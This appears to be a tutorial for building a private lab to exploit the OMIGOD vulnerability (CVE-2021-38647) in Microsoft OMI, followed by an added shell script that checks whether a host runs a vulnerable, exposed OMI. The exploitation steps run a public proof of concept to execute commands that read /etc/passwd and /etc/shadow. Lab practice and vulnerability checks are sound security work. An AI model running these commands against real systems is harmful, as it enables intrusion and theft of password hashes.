Creating your own private pwn lab for OMI Exploitation
First off, huge thanks to IPPSEC for posting this video and doing the heavy lifting; it was my starting point for building a private OMI exploitation lab without hosting it on Azure.
At first I ran into SSL issues with the OMI install, followed by namespace issues with the SOAP requests from the exploit POC I was using. To keep things simple, I have documented everything you need to build your own private OMI pwn lab.
Step 1: Download Ubuntu Server 20.04.3
Step 2: Download the following packages with wget directly on the server:
wget https://github.com/microsoft/omi/releases/download/v1.6.8-0/omi-1.6.8-0.ssl_110.ulinux.x64.deb
wget https://github.com/microsoft/SCXcore/releases/download/v1.6.8-1/scx-1.6.8-1.ssl_110.ulinux.x64.deb
Step 3: Install the vulnerable OMI release on the Ubuntu server
sudo dpkg -i omi-1.6.8-0.ssl_110.ulinux.x64.deb
Step 4: Modify omiserver.conf on the Ubuntu server so that it listens on port 5986 for HTTPS
cd /etc/opt/omi/conf
sudo nano omiserver.conf
Once you have saved the updated file, restart the OMI service with the following command:
sudo service omid restart
Step 5: Install the SCX Core package on the Ubuntu server. This fixes the namespace issues encountered when running the OMIGOD exploit POC
sudo dpkg -i scx-1.6.8-1.ssl_110.ulinux.x64.deb
Step 6: Download the OMIGOD exploit POC (on your attacking box, such as Kali)
git clone https://github.com/horizon3ai/CVE-2021-38647
Once the repository is cloned, you should be able to run the following example command to see which user the exploit runs as when targeting the vulnerable Ubuntu server (replace the IP with the IP of your vulnerable Ubuntu server):
python3 omigod.py -t 10.0.0.5 -c id
From here you can try other commands for reconnaissance or exploitation, such as:
Gathering users:
python3 omigod.py -t 10.0.0.5 -c 'cat /etc/passwd'
Getting password hashes:
python3 omigod.py -t 10.0.0.5 -c 'cat /etc/shadow'
There are plenty of possibilities to explore from here.
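Before running the POC it is worth confirming that a host is actually in the state Steps 3 and 4 produce (a defender can run the same check against production hosts to find the reverse: an exposed, unpatched OMI). The following POSIX shell check is an added example, not code from the original post or from the OMI project; it assumes that 1.6.8-1 is the first OMI build that fixes CVE-2021-38647 and that omiserver.conf enables the HTTPS listener through an "httpsport=" key.

```shell
# Added example (not from the original post or the OMI project): decide whether
# an OMI host is in the state this lab builds: vulnerable package + HTTPS on.
# Assumed: 1.6.8-1 is the first fixed build; omiserver.conf uses "httpsport=".

OMI_FIXED_VERSION="1.6.8-1"

# omi_vercmp A B: prints -1, 0 or 1 as A is older than, equal to, or newer than B.
# Versions look like MAJOR.MINOR.PATCH-REV; a missing REV counts as 0.
omi_vercmp() {
    left=$(printf '%s' "$1" | sed 's/[.-]/ /g')
    right=$(printf '%s' "$2" | sed 's/[.-]/ /g')
    set -- $left
    l1=$1 l2=$2 l3=$3 l4=${4:-0}
    set -- $right
    r1=$1 r2=$2 r3=$3 r4=${4:-0}
    for pair in "$l1 $r1" "$l2 $r2" "$l3 $r3" "$l4 $r4"; do
        set -- $pair
        [ "$1" -lt "$2" ] && { printf '%s\n' -1; return 0; }
        [ "$1" -gt "$2" ] && { printf '%s\n' 1; return 0; }
    done
    printf '%s\n' 0
}

# omi_is_vulnerable VERSION: succeeds when VERSION predates the fixed build.
omi_is_vulnerable() {
    [ "$(omi_vercmp "$1" "$OMI_FIXED_VERSION")" -lt 0 ]
}

# omi_https_port: reads omiserver.conf on stdin, prints the HTTPS port (0 = off).
omi_https_port() {
    port=$(sed -n 's/^[[:space:]]*httpsport[[:space:]]*=[[:space:]]*\([0-9][0-9]*\).*/\1/p' | tail -n 1)
    printf '%s\n' "${port:-0}"
}

# omi_lab_state VERSION PORT: one-word verdict combining both signals.
omi_lab_state() {
    if omi_is_vulnerable "$1"; then
        if [ "$2" -ne 0 ]; then printf '%s\n' vulnerable-and-exposed
        else printf '%s\n' vulnerable-local-only; fi
    else
        printf '%s\n' patched
    fi
}

# Constructed excerpt of /etc/opt/omi/conf/omiserver.conf as edited in Step 4.
SAMPLE_CONF='httpport=0
httpsport=5986'

state=$(omi_lab_state "1.6.8-0" "$(printf '%s\n' "$SAMPLE_CONF" | omi_https_port)")
printf 'omi 1.6.8-0 with the Step 4 config: %s\n' "$state"   # vulnerable-and-exposed
```

On a real host, feed it the installed version and the live config instead of the sample: omi_lab_state "$(dpkg-query -W -f '${Version}' omi)" "$(omi_https_port < /etc/opt/omi/conf/omiserver.conf)".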